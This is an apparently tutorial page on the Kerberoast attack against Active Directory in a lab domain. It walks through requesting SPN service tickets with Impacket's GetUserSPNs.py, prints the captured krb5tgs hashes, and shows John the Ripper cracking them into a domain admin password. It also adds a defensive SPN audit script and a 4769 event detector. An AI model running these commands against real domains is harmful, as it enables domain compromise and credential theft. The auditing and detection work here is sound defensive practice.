Kerberoast Attack
This page deals with compromising Active Directory with a Kerberoast attack.
Introduction
For several reasons, it is very common in Active Directory environments to find services running under domain administrator accounts. A Service Principal Name (SPN) ties a service instance to the account that runs it, as in the following listing:
ServicePrincipalName Name MemberOf PasswordLastSet
---------------------------------- ---------- ------------------------------------------------ -------------------
http/win10.sittingduck.info uberuser CN=Domain Admins,CN=Users,DC=sittingduck,DC=info 2015-11-10 23:47:21
MSSQLSvc/WIN2K8R2.sittingduck.info sqladmin01 2016-05-13 19:13:20
Any domain user can request a service ticket for any SPN. The ticket is encrypted with the service account's password hash, so it can be taken offline and cracked to recover the cleartext password of the domain administrator account that launched the service.
If the attack succeeds, the attacker compromises the Active Directory domain.
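The risky configuration described above (an SPN on a privileged account, with a password that has not been rotated in years) is something a defender can audit for directly. The following script is an added example, not part of the original page or of Impacket: it runs over constructed records shaped like the GetUserSPNs.py columns shown on this page and reports which SPN-bearing accounts are members of privileged groups or have stale passwords. In a real environment the rows would come from an LDAP query for `servicePrincipalName=*`; the `PRIVILEGED_GROUPS` set, the one-year `MAX_PASSWORD_AGE` threshold and the `svc_db02$` row are assumptions.

```python
"""Audit SPN-bearing accounts for Kerberoast exposure.

Added example, not part of the original page or of Impacket. It works on
constructed records shaped like the GetUserSPNs.py columns shown above
(ServicePrincipalName, Name, MemberOf, PasswordLastSet). The rows are
embedded so the script runs offline; in production they would come from
an LDAP query for servicePrincipalName=*.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed policy values: which groups count as privileged, and how old a
# service account password may be before it is considered stale.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
MAX_PASSWORD_AGE = timedelta(days=365)
REFERENCE_DATE = datetime(2017, 1, 1)  # "now" for the sample run


@dataclass
class SpnAccount:
    spn: str
    name: str
    member_of: str            # DN of the group, "" if none
    password_last_set: datetime


# Constructed sample rows mirroring the output shown on this page, plus one
# hypothetical gMSA-style account (name ending in '$') to show the exemption.
SAMPLE_ACCOUNTS = [
    SpnAccount("http/win10.sittingduck.info", "uberuser",
               "CN=Domain Admins,CN=Users,DC=sittingduck,DC=info",
               datetime(2015, 11, 10, 23, 47, 21)),
    SpnAccount("MSSQLSvc/WIN2K8R2.sittingduck.info", "sqladmin01", "",
               datetime(2016, 5, 13, 19, 13, 20)),
    SpnAccount("MSSQLSvc/db02.sittingduck.info", "svc_db02$", "",
               datetime(2016, 5, 1, 8, 0, 0)),
]


def group_cn(dn: str) -> str:
    """Return the CN of a group DN, e.g. 'Domain Admins' from 'CN=Domain Admins,...'."""
    if not dn.startswith("CN="):
        return ""
    return dn[3:].split(",", 1)[0]


def audit(accounts, now: datetime):
    """Return a list of (account name, finding) pairs.

    Two findings are raised:
    - 'privileged': the SPN account is in a privileged group, so a cracked
      ticket hands over domain-level access; the service should run under a
      dedicated low-privilege account instead.
    - 'stale-password': the password is older than MAX_PASSWORD_AGE, giving an
      offline cracker unlimited time; long rotated passwords or a group
      managed service account (machine-managed password) address this.
    Accounts whose name ends in '$' (computer or gMSA accounts) are skipped
    for the password check because their passwords rotate automatically.
    """
    findings = []
    for acct in accounts:
        if group_cn(acct.member_of) in PRIVILEGED_GROUPS:
            findings.append((acct.name, "privileged"))
        if acct.name.endswith("$"):
            continue
        if now - acct.password_last_set > MAX_PASSWORD_AGE:
            findings.append((acct.name, "stale-password"))
    return findings


if __name__ == "__main__":
    for name, finding in audit(SAMPLE_ACCOUNTS, REFERENCE_DATE):
        print(f"{name}: {finding}")
```

On the sample rows only `uberuser` is flagged, on both counts: it sits in Domain Admins and its password dates from 2015, which is exactly the combination that makes the ticket cracked later on this page worth cracking.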
Request SPN Tickets
Use Impacket's GetUserSPNs.py:
root@wpad:~/impacket/examples# ./GetUserSPNs.py -request sittingduck.info/notanadmin
Impacket v0.9.15-dev - Copyright 2002-2016 Core Security Technologies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet
---------------------------------- ---------- ---------------------------------------------------- -------------------
http/win10.sittingduck.info uberuser CN=Domain Admins,CN=Users,DC=sittingduck,DC=info 2015-11-10 23:47:21
MSSQLSvc/WIN2K8R2.sittingduck.info sqladmin01 2016-05-13 19:13:20
$krb5tgs$23$*sqladmin01$SITTINGDUCK.INFO$SPN*$6e5307df490c6e3339f613fdc5655785$80ba233b4d24531202f2e354c99e7eda807bde7aeeb48ee4cdb6bf809d78652413699e3cff8b9b78b9ee70e997a538155fc7f72e208d715020d458b8413d4b12b212738833c4694d84937d65cb8ecd0020c00a5d39c07da35a748ea2cb062fca4fa9b282e7046d70ee1cae4cfee7d6f791052e283
$krb5tgs$23$*uberuser$SITTINGDUCK.INFO$SPN*$27c08ed2a8d5394f66e8c13c25c98393$310b787ec5c10b20fcc0acb1406b6a6e2ffddd71de3dc4c70c19e5dfcf262cc88574e61cb3940ebfd574b2bb555f2b05f84d8526e3cf46fc0ca57e03467729757cbf79da9f55cde9dabdda68e80dce6564e9f1b904b0585dbc813b82abf89e973e41c102b664f4c649f85acaf7904a273dddcb9315a66f27334f313190e1caf4f5055b671d250f5912cc1871a1dd4a6126087ddfb98ade8f7dde495ee8ad76583aa5a12eef63a690dd82a15eaaca0d7594f2f1dbc899035d89dd628b291590058cfb3405d1dfe4a383be5704465d9c8972ef8f1cba3541fdfa7dcf5063eaed74051fa18bd73f7b4f7d77
uberuser belongs to the Domain Admins group (see the MemberOf column).
Crack Tickets
First, install the magnumripper (jumbo) build of John the Ripper, which supports the krb5tgs format.
Then crack the tickets to obtain the cleartext passwords:
root@wpad:~/johntheripper/run# ./john /tmp/johnkirb.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 11 password hashes with 11 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4] )
Warning: OpenMP is disabled ; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 3.35% (ETA: 23:38:44 ) 0g/s 69751p/s 767263c/s 767263C/s 129700..123junior
ASDqwe123 ($krb5tgs$unkown)
ASDqwe123 ($krb5tgs$unkown)
It is an efficient way to compromise a domain administrator password and, consequently, the Active Directory domain.
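On the domain controller, the ticket requests from the GetUserSPNs.py run above leave a trail: one event ID 4769 ("A Kerberos service ticket was requested") per SPN, all from the same account within seconds and all with TicketEncryptionType 0x17 (RC4-HMAC, etype 23, the format John loaded above). The following detector is an added example, not part of the original page or of any SIEM product. It parses constructed log lines in an assumed single-line layout carrying the real 4769 field names, and alerts when one account requests RC4 tickets for several distinct services inside a short window; the `WINDOW` and `MIN_DISTINCT_SPNS` thresholds, the `svc_backup`/`svc_web` service names and the IP addresses are assumptions.

```python
"""Detect Kerberoast-style ticket requests in Windows Security logs.

Added example, not part of the original page. It scans constructed lines
shaped like event ID 4769 and flags a single account that requests tickets
for many distinct SPNs with RC4 (TicketEncryptionType 0x17) in a short
window, the pattern a GetUserSPNs.py -request run produces on the DC.
Real logs would come from the DC's Security channel or a SIEM; the field
names follow the 4769 event, the one-line layout is an assumption.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"               # etype 23: the type offline crackers target
WINDOW = timedelta(minutes=5)   # assumed correlation window
MIN_DISTINCT_SPNS = 3           # assumed threshold before alerting

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) 4769 AccountName=(?P<account>\S+) "
    r"ServiceName=(?P<service>\S+) TicketEncryptionType=(?P<etype>0x[0-9a-fA-F]+) "
    r"IpAddress=(?P<ip>\S+)$"
)

# Constructed sample log lines. 'notanadmin' mirrors the requesting user on
# this page; alice's AES (0x12) requests and bob's single RC4 request are
# benign traffic that must not trigger the alert.
SAMPLE_LOG = """\
2016-05-20 23:30:01 4769 AccountName=notanadmin@SITTINGDUCK.INFO ServiceName=uberuser TicketEncryptionType=0x17 IpAddress=10.0.0.5
2016-05-20 23:30:01 4769 AccountName=notanadmin@SITTINGDUCK.INFO ServiceName=sqladmin01 TicketEncryptionType=0x17 IpAddress=10.0.0.5
2016-05-20 23:30:02 4769 AccountName=notanadmin@SITTINGDUCK.INFO ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.0.0.5
2016-05-20 23:30:02 4769 AccountName=notanadmin@SITTINGDUCK.INFO ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.5
2016-05-20 23:31:10 4769 AccountName=alice@SITTINGDUCK.INFO ServiceName=WIN10$ TicketEncryptionType=0x12 IpAddress=10.0.0.8
2016-05-20 23:31:11 4769 AccountName=alice@SITTINGDUCK.INFO ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.0.0.8
2016-05-21 08:00:00 4769 AccountName=bob@SITTINGDUCK.INFO ServiceName=sqladmin01 TicketEncryptionType=0x17 IpAddress=10.0.0.9
"""


def parse(lines):
    """Yield parsed 4769 events as dicts; lines that do not match are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")
        yield ev


def detect(lines):
    """Return {account: sorted service list} for accounts that requested RC4
    tickets for at least MIN_DISTINCT_SPNS distinct services within WINDOW.

    Computer accounts (ServiceName ending in '$') and krbtgt are ignored:
    ordinary logons generate those requests and they are not user SPNs.
    """
    rc4_requests = defaultdict(list)   # account -> [(timestamp, service)]
    for ev in parse(lines):
        svc = ev["service"]
        if ev["etype"].lower() != RC4_HMAC or svc.endswith("$") or svc == "krbtgt":
            continue
        rc4_requests[ev["account"]].append((ev["ts"], svc))

    alerts = {}
    for account, reqs in rc4_requests.items():
        reqs.sort()
        # Sliding window: from each request, count distinct services seen
        # within WINDOW after it; one hit is enough to alert on the account.
        for i, (start, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - start <= WINDOW}
            if len(services) >= MIN_DISTINCT_SPNS:
                alerts[account] = sorted(services)
                break
    return alerts


if __name__ == "__main__":
    for account, services in detect(SAMPLE_LOG.splitlines()).items():
        print(f"ALERT {account} requested RC4 tickets for {len(services)} SPNs: {services}")
```

The RC4 filter is what keeps this rule quiet in a healthy domain: clients normally negotiate AES (0x11/0x12) for service tickets, so a burst of 0x17 requests for user-account SPNs stands out. Enabling AES on service accounts and retiring RC4 where possible removes the cheap-to-crack ticket format altogether, which is the mitigation that pairs with this detection.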